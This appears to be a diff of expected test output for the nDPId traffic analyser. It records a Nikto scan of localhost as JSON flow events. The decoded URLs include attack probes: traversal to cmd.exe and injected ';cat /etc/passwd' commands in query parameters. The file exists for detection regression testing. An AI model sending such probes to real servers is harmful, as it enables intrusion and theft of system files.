 00692{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":1,"flow_last_seen":1576420277522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"ts_msec":1576420277522,"pkt":"AAAAAAAAAAAAAAAACABFAADYfsdAAEAGvVZ\/AAABfwAAAcW6H5DDSkYijR1boIAYAED+zAAAAQEICp1m\/jqdZv46R0VUIC9jL3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyKy9PRyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDQ5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7440000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"ts_msec":1576420277522,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/c\/winnt\/system32\/cmd.exe?\/c+dir+\/OG","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000491)"}}
+01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7440000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"ts_msec":1576420277522,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/c\/winnt\/system32\/cmd.exe?\/c+dir+\/OG","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000491)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"ts_msec":1576420277525,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00739{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":1,"flow_last_seen":1576420277525,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"ts_msec":1576420277525,"pkt":"AAAAAAAAAAAAAAAACABFAAD8VQBAAEAG5vl\/AAABfwAAAcW8H5BNImwcgJPNrYAYAED+8AAAAQEICp1m\/j2dZv48R0VUIC9tc2FkYy8uLiUyNTVjLi4vLi4lMjU1Yy4uLy4uJTI1NWMuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpcitjOiU1YyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwNDk0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"ts_msec":1576420277525,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:%5c","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000494)"}}
+01117{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"ts_msec":1576420277525,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:%5c","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000494)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"ts_msec":1576420277526,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00739{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":1,"flow_last_seen":1576420277526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"ts_msec":1576420277526,"pkt":"AAAAAAAAAAAAAAAACABFAAD8wPBAAEAGewl\/AAABfwAAAcW+H5C+lvgMjxfu9IAYAED+8AAAAQEICp1m\/j6dZv4+R0VUIC9tc2FkYy8uLiUyNTVjLi4vLi4lMjU1Yy4uLy4uJTI1NWMuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpcitjOiU1YyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDQ5NSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"ts_msec":1576420277526,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:%5c","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000495)"}}
+01117{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"ts_msec":1576420277526,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:%5c","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000495)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"ts_msec":1576420277527,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":1,"flow_last_seen":1576420277527,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"ts_msec":1576420277527,"pkt":"AAAAAAAAAAAAAAAACABFAADOGxtAAEAGIQ1\/AAABfwAAAcXAH5ABqiP992RjDoAYAED+wgAAAQEICp1m\/j+dZv4\/R0VUIC9tc2FkYy9zYW1wbGVzL2FkY3Rlc3QuYXNwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwNDk2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"ts_msec":1576420277527,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/samples\/adctest.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000496)"}}
+01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"ts_msec":1576420277527,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/samples\/adctest.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000496)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"ts_msec":1576420277528,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00700{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":1,"flow_last_seen":1576420277528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"ts_msec":1576420277528,"pkt":"AAAAAAAAAAAAAAAACABFAADdW\/pAAEAG4B5\/AAABfwAAAcXCH5D1lWMf6eFgloAYAED+0QAAAQEICp1m\/kCdZv5AR0VUIC9hdGhlbmFyZWcucGhwP3Bhc3M9JTIwO2NhdCUyMC9ldGMvcGFzc3dkIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDA2NjcpDQoNCg=="}
-00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"ts_msec":1576420277528,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/athenareg.php?pass=%20;cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000667)"}}
+01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"ts_msec":1576420277528,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/athenareg.php?pass=%20;cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000667)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"ts_msec":1576420277534,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":1,"flow_last_seen":1576420277534,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"ts_msec":1576420277534,"pkt":"AAAAAAAAAAAAAAAACABFAADO4OJAAEAGW0V\/AAABfwAAAcXEH5B2FdgIExVLAoAYAED+wgAAAQEICp1m\/kWdZv5FR0VUIC9jZC1jZ2kvc3NjZF9zdW5jb3VyaWVyLnBsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDY3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"ts_msec":1576420277534,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cd-cgi\/sscd_suncourier.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001067)"}}
+01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"ts_msec":1576420277534,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cd-cgi\/sscd_suncourier.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001067)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277535,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":1,"flow_last_seen":1576420277535,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420277535,"pkt":"AAAAAAAAAAAAAAAACABFAADEalJAAEAG0d9\/AAABfwAAAcXGH5Ak\/VK4qoIqcIAYAED+uAAAAQEICp1m\/kedZv5HR0VUIC9jZ2ktYmluL2hhbmRsZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA2OSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277535,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/handler","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001069)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277535,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/handler","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001069)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7440000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"ts_msec":1576420277536,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00719{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":1,"flow_last_seen":1576420277536,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"ts_msec":1576420277536,"pkt":"AAAAAAAAAAAAAAAACABFAADsKwtAAEAGEP9\/AAABfwAAAcXIH5DuMhPiKIF7BYAYAED+4AAAAQEICp1m\/kidZv5IR0VUIC9jZ2ktYmluL2hhbmRsZXIvbmV0c29uYXI7Y2F0IC9ldGMvcGFzc3dkfD9kYXRhPURvd25sb2FkIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDcwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00909{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7440000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"ts_msec":1576420277536,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/handler\/netsonar;cat \/etc\/passwd|?data=Download","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001070)"}}
+01098{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7440000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"ts_msec":1576420277536,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/handler\/netsonar;cat \/etc\/passwd|?data=Download","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001070)"}}
